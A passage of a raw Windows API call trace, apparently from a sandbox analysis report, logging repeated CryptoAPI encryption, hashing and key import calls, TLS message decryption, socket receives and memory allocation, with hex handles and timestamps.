hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.729] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0137.730] malloc (_Size=0x1fd) returned 0x3d81e60 [0137.730] free (_Block=0x0) [0137.730] free (_Block=0x3df00e0) [0137.730] malloc (_Size=0x1fd) returned 0x3df00e0 [0137.731] free (_Block=0x0) [0137.731] CryptDuplicateHash (in: hHash=0x432df8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0137.731] CryptHashData (hHash=0x432978, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0137.731] malloc (_Size=0x14) returned 0x3f653e0 [0137.731] free (_Block=0x0) [0137.731] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x37dfacc) returned 1 [0137.731] CryptHashData (hHash=0x432df8, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0137.731] free (_Block=0x3f653e0) [0137.731] CryptDestroyHash (hHash=0x432978) returned 1 [0137.731] free (_Block=0x3df00e0) [0137.731] free (_Block=0x3594d18) [0137.731] malloc (_Size=0x1fd) returned 0x3594d18 [0137.731] free (_Block=0x0) [0137.731] free (_Block=0x0) [0137.731] free (_Block=0x0) [0137.732] SetEvent (hEvent=0x3a4) returned 1 [0137.732] free (_Block=0x0) [0137.732] free (_Block=0x3594d18) [0137.732] free (_Block=0x3d81e60) [0137.732] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0137.732] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0137.983] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0137.983] malloc (_Size=0x1fd) returned 0x3594d18 [0137.983] free (_Block=0x0) [0137.983] malloc (_Size=0x1fd) returned 0x3df0420 [0137.984] free (_Block=0x0) [0137.984] free (_Block=0x0) [0137.984] free (_Block=0x3594d18) [0137.984] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x4329b8) returned 1 [0137.989] CryptExportKey (in: hKey=0x4329b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0137.989] CryptExportKey (in: hKey=0x4329b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0137.989] malloc (_Size=0x80) returned 0x609e90 [0137.989] free (_Block=0x0) [0137.989] CryptDestroyKey (hKey=0x4329b8) returned 1 [0137.989] malloc (_Size=0x64) returned 0x60b4d0 [0137.989] free (_Block=0x0) [0137.990] malloc (_Size=0x80) returned 0x609b60 [0137.990] free (_Block=0x0) [0137.990] malloc (_Size=0xc0) returned 0x605a18 [0137.990] free (_Block=0x609b60) [0137.990] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.990] CryptHashData (hHash=0x432978, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.990] malloc (_Size=0x14) returned 0x3f65280 [0137.990] free (_Block=0x0) [0137.990] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfa34) returned 1 [0137.990] CryptDestroyHash (hHash=0x432978) returned 1 [0137.990] free (_Block=0x3f65280) [0137.990] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.990] CryptHashData (hHash=0x432978, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.990] malloc (_Size=0x14) returned 0x3f65340 [0137.990] free (_Block=0x0) [0137.990] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x37dfa34) returned 1 [0137.990] CryptDestroyHash (hHash=0x432978) returned 1 [0137.990] free (_Block=0x3f65340) [0137.990] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.990] CryptHashData (hHash=0x432bf8, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.991] malloc (_Size=0x14) returned 0x3f65360 [0137.991] free (_Block=0x0) [0137.991] CryptGetHashParam (in: hHash=0x432bf8, dwParam=0x2, pbData=0x3f65360, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65360, pdwDataLen=0x37dfa34) returned 1 [0137.991] CryptDestroyHash (hHash=0x432bf8) returned 1 [0137.991] free (_Block=0x3f65360) [0137.991] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.991] CryptHashData (hHash=0x432eb8, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.991] malloc (_Size=0x14) returned 0x3f65340 [0137.991] free (_Block=0x0) [0137.991] CryptGetHashParam (in: hHash=0x432eb8, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x37dfa34) returned 1 [0137.991] CryptDestroyHash (hHash=0x432eb8) returned 1 [0137.991] free (_Block=0x3f65340) [0137.991] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0137.991] CryptHashData (hHash=0x432bf8, pbData=0x605a18, dwDataLen=0x81, dwFlags=0x0) returned 1 [0137.991] malloc (_Size=0x14) returned 0x3f65280 [0137.991] free (_Block=0x0) [0137.991] CryptGetHashParam (in: hHash=0x432bf8, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x37dfa34) returned 1 [0137.991] CryptDestroyHash (hHash=0x432bf8) returned 1 [0137.991] free (_Block=0x3f65280) [0137.991] free (_Block=0x605a18) [0137.991] malloc (_Size=0x50) returned 0x3d9afb8 [0137.992] free (_Block=0x0) [0137.992] free (_Block=0x60b4d0) [0137.992] free (_Block=0x609e90) [0137.992] malloc (_Size=0xb8) returned 0x605a18 [0137.992] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x605ac8 | out: phHash=0x605ac8) returned 1 [0137.992] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x605acc | out: phHash=0x605acc) returned 1 [0137.992] CryptHashData (hHash=0x432bf8, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0137.992] CryptHashData (hHash=0x4329f8, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0137.992] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432cb8) returned 1 [0137.992] CryptSetKeyParam (hKey=0x432cb8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0137.992] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x4327b8) returned 1 [0137.992] CryptSetKeyParam (hKey=0x4327b8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0137.992] free (_Block=0x3d9afb8) [0137.992] malloc (_Size=0x10) returned 0x3648e60 [0137.992] free (_Block=0x0) [0137.992] SetEvent (hEvent=0x5c8) returned 1 [0137.992] free (_Block=0x3df0420) [0137.993] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0137.993] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0142.030] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0142.030] malloc (_Size=0x1fd) returned 0x3df0420 [0142.030] free (_Block=0x0) [0142.031] malloc (_Size=0x1fd) returned 0x3d81e60 [0142.031] free (_Block=0x0) [0142.031] free (_Block=0x0) [0142.031] free (_Block=0x3df0420) [0142.031] malloc (_Size=0x1fd) returned 0x3df0420 [0142.031] free (_Block=0x0) [0142.031] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.031] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.031] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.031] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.031] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.031] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.032] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.033] malloc (_Size=0x1fd) returned 0x3def350 [0142.033] free (_Block=0x0) [0142.033] free (_Block=0x3d81e60) [0142.034] malloc (_Size=0x1fd) returned 0x3d81e60 [0142.034] free (_Block=0x0) [0142.034] CryptDuplicateHash (in: hHash=0x4329f8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.034] CryptHashData (hHash=0x432d78, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.034] malloc (_Size=0x14) returned 0x3f654c0 [0142.034] free (_Block=0x0) [0142.034] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f654c0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f654c0, pdwDataLen=0x37dfacc) returned 1 [0142.034] CryptHashData (hHash=0x4329f8, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.034] free (_Block=0x3f654c0) [0142.034] CryptDestroyHash (hHash=0x432d78) returned 1 [0142.034] free (_Block=0x3d81e60) [0142.034] free (_Block=0x3df0420) [0142.034] malloc (_Size=0x1fd) returned 0x3df0420 [0142.034] free (_Block=0x0) [0142.034] malloc (_Size=0x94) returned 0x3594e80 [0142.034] free (_Block=0x0) [0142.035] malloc (_Size=0x94) returned 0x3594d18 [0142.035] free (_Block=0x0) [0142.035] free (_Block=0x0) [0142.035] free (_Block=0x3594e80) [0142.035] CryptImportKey (in: hProv=0x3e57b0, pbData=0x37df5b8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x37df5b4 | out: phKey=0x37df5b4*=0x432d78) returned 1 [0142.041] CryptExportKey (in: hKey=0x432d78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df21c, pdwDataLen=0x37df204 | out: pbData=0x37df21c*, pdwDataLen=0x37df204*=0x90) returned 1 [0142.041] CryptExportKey (in: hKey=0x432d78, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x37df8e8, pdwDataLen=0x37df5ac | out: pbData=0x37df8e8*, pdwDataLen=0x37df5ac*=0x90) returned 1 [0142.041] malloc (_Size=0x80) returned 0x60a248 [0142.041] free (_Block=0x0) [0142.041] CryptDestroyKey (hKey=0x432d78) returned 1 [0142.041] malloc (_Size=0x64) returned 0x60ae40 [0142.041] free (_Block=0x0) [0142.041] malloc (_Size=0x80) returned 0x609cf8 [0142.041] free (_Block=0x0) [0142.041] malloc (_Size=0xc0) returned 0x3d81e60 [0142.041] free (_Block=0x609cf8) [0142.041] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0142.041] CryptHashData (hHash=0x432978, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0142.041] malloc (_Size=0x14) returned 0x3f651e0 [0142.042] free (_Block=0x0) [0142.042] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfa34) returned 1 [0142.042] CryptDestroyHash (hHash=0x432978) returned 1 [0142.042] free (_Block=0x3f651e0) [0142.042] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0142.042] CryptHashData (hHash=0x432d78, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0142.042] malloc (_Size=0x14) returned 0x3f653e0 [0142.042] free (_Block=0x0) [0142.042] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x37dfa34) returned 1 [0142.042] CryptDestroyHash (hHash=0x432d78) returned 1 [0142.042] free (_Block=0x3f653e0) [0142.042] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0142.042] CryptHashData (hHash=0x432d78, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0142.042] malloc (_Size=0x14) returned 0x3f651e0 [0142.042] free (_Block=0x0) [0142.042] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfa34) returned 1 [0142.042] CryptDestroyHash (hHash=0x432d78) returned 1 [0142.042] free (_Block=0x3f651e0) [0142.042] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0142.043] CryptHashData (hHash=0x4327f8, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0142.043] malloc (_Size=0x14) returned 0x3f651e0 [0142.043] free (_Block=0x0) [0142.043] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfa34) returned 1 [0142.043] CryptDestroyHash (hHash=0x4327f8) returned 1 [0142.043] free (_Block=0x3f651e0) [0142.043] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x37dfa3c | out: phHash=0x37dfa3c) returned 1 [0142.043] CryptHashData (hHash=0x432d78, pbData=0x3d81e60, dwDataLen=0x81, dwFlags=0x0) returned 1 [0142.043] malloc (_Size=0x14) returned 0x3f651e0 [0142.043] free (_Block=0x0) [0142.043] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f651e0, pdwDataLen=0x37dfa34, dwFlags=0x0 | out: pbData=0x3f651e0, pdwDataLen=0x37dfa34) returned 1 [0142.043] CryptDestroyHash (hHash=0x432d78) returned 1 [0142.043] free (_Block=0x3f651e0) [0142.043] free (_Block=0x3d81e60) [0142.043] malloc (_Size=0x50) returned 0x3d9ada8 [0142.043] free (_Block=0x0) [0142.043] free (_Block=0x60ae40) [0142.043] free (_Block=0x60a248) [0142.043] malloc (_Size=0xb8) returned 0x3d81e60 [0142.043] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3d81f10 | out: phHash=0x3d81f10) returned 1 [0142.043] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3d81f14 | out: phHash=0x3d81f14) returned 1 [0142.044] CryptHashData (hHash=0x432d78, pbData=0x37dfa54, dwDataLen=0x14, dwFlags=0x0) returned 1 [0142.044] CryptHashData (hHash=0x432eb8, pbData=0x37dfad4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0142.044] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432978) returned 1 [0142.044] CryptSetKeyParam (hKey=0x432978, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0142.044] CryptImportKey (in: hProv=0x3cf450, pbData=0x37dfa70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x37dfa6c | out: phKey=0x37dfa6c*=0x432738) returned 1 [0142.044] CryptSetKeyParam (hKey=0x432738, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0142.044] free (_Block=0x3d9ada8) [0142.044] SetEvent (hEvent=0x5c8) returned 1 [0142.044] free (_Block=0x3594d18) [0142.044] free (_Block=0x3df0420) [0142.044] free (_Block=0x3def350) [0142.044] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, 